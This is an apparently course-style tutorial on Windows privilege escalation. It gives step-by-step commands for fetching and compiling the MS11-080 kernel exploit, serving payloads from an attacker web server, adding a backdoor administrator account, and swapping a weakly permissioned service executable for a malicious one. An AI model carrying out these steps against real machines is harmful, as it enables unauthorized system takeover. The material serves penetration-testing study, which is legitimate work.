Priv Esc is the process of increasing the level of access on a machine or network. This is normally performed as part of the post-exploitation phase. As attackers we try to increase our level of control on a system and expand our reach in to the network. In most operating systems and networked environments, the process of privilege escalation is inherently prevented in order to adhere to the User Privilege Seperation Model. Therfor by definition, the process of Privilege Escalation will involve breaking the security model. To our aid in this process, comes vulnerable and outdated software, administrative misconfigurations and human error, which all may lead to chinks in the armour of the User Separation Security Model.

We will start by looking at Privilege Escalation exploits. These exploits work by targeted higher privilege services or systems such as drivers or kernal functions and when successful, these exploits often allow full elevation of access or privileges.

PRIVILEGE ESCALATION - Exploits in Windows

A nice privilege escalation exploit to demonstrate for the windows environment is ms11_080. (AFD Join Leaf vulnerability). This demonstrates a poor validation of input from user mode to the windows kernel.

In this case the ancillary driver allowed the user to pass an unchecked buffer which would lead to an arbitrary overwrite in kernel space which in turn could then be used to gain system level code execution. This exploit affects both the 32 and 64 bit versions of WIndows XP and also Windows 2003.

A python exploit was written for this vulnerability that targeted specifically windows XP and windows 2003 server systems. This can be found on the exploit-db here:
https://www.exploit-db.com/exploits/18176/

Let's download this exploit and try it out.

Right click on the download and copy the link location, then
#wget -o ms11-080.py https://www.exploit-db.com/exploits/18176/

Relabel the file to ms11-080.py
#mv 18176.py ms11-080.py

Since this file is python, we would need to be extremely lucky if this were to run on the windows server as python is not installed by default. One option is to convert the file to a windows executable using the pythonpy installer module. To do this we need to install python modules on a windows machine. Eg. pywin32-218.win32-py2.7 and extract the pythonpy (2.0) installer script and place the extracted directory on the desktop.

Once extracted and placed on the desktop I moved the ms11-080.py file to the windows machine by copying it to the /var/www/html directory as txt file and then starting the apache2 service, allowing me to browse to the file.

#cp ms11-080.py /var/www/html/ms11-080.txt
#service apache2 start

we then save the file in the pyinstaller directory.
We then enter that directory using a command prompt on the windows machine and rename the exploit if needed.
C:\>move ms11-080.txt ms11-080.py

Now, all that is left to do is invoke the PyInstaller script and if all goes well, the python code should be compiled to a windows executable file.
C:\>python PyInstaller.py --onefile ms11-080.py

We will find the file in the pyinstaller/ms11-080/dist folder.

We can check this file and once we are happy with it, we can copy it to the Kali machine and host it in the webroot directory.

Open up a Windows 2003 machine with a standard user account. Download the exploit and run it from the command line.
C:\>ms11-080.exe -O 2K3

This will result in a system level shell.

Add a new user to the system:
C:\>net user hacker hacker /add

Add the user hacker to the administrators group on the machine.
C:\>net localgroup administrators hacker /add

PRIVILEGE ESCALATION - Abusing weak service Permissions on Windows
Exploit are not the only way to go when it comes to privilege escalation. The process of achieving privilege escalation is more often achieved by exploiting various misconfigurations on the target rather than exploiting a vulnerable service with high privileges.

In a corporate environment where patching may be quite up to date, we are more likely to succeed by exploiting misconfigurations.

The mishandling of file and folder user permissions on the system may lead to situations which allow for privilege escalation attacks to occur.

Imagine this scenario:

A software developer creates a piece of software that runs as a windows service, during the installation of the program, the developer does not take care to verify the access permissions of the file used by the service. The file is then installed on the system and allows not privileged users to have full read and write access to it. This oversite now allows non privileged users to replace this file with their own malicious one and the next time the machine is restarted, the file will be executed with system privileges.

Install a low priv user call low priv with a password of mypass:
Add a new user to the system:
C:\>net user lowpriv mypass /add

Add the user hacker to the administrators group on the machine.
C:\>net localgroup "Remote Desktop users" lowpriv /add

Install PhotoDex and reboot the machine.

Once the machine has rebooted, check the services.
C:\>services.msc

Checking the properties of a service allows us to see the path of executable that it runs at start up. When we look at the SCSIAccess service we see the SCSIAcess.exe file is run.

Checking the permissions on this file using the Microsoft Integrity Control Access Control Utility .
C:\Program Files\PhotoDex\Proshow Producer>icacls scsiaccess.exe

The above command reveals that there is a misconfiguration that the EVERYONE group has full access to this executable, meaning that as low priv users, we can now replace this file with our own. The next time that the service is restarted, our file is executed by the service manager with system privileges.

Let's give this a try by creating a window's executable that will add our user to the administrators group.

Copy the file to the webroot directoty of the kali machine so that we have browse to this from the windows machine to download the file.
#cp useradd.exe /var/www/html/

On the windows machine browse to the location where the file is now being served. In my case this is http://10.11.0.179/useradd.exe

Now we want to rename the scsiaccess.exe file:
C:\Program Files\PhotoDex\Proshow Producer>move scsiaccess.exe scsiaccess.exe.orig

And now we will copy our useradd.exe file in to this location and call it scsiaccess.exe
C:\Program Files\PhotoDex\Proshow Producer>copy c:\users\lowpriv\Desktop\useradd.exe scsiaccess.exe

Now that the scsiaccess file has been replaced, the next time that the service restarts or the system is restarted, the fake scsiaccess.exe file will be run with system privileges.

PRIVILEGE ESCALATION SUMMARY:
- exploit a vulnerable service with high privileges.
- exploit various misconfigurations on the target.
- sensitive files left on the file system
- excel files with the keys to the kingdom.
- group policy configuration files
- unattended configuration files
- badly written scripts with info within.
- stay up to date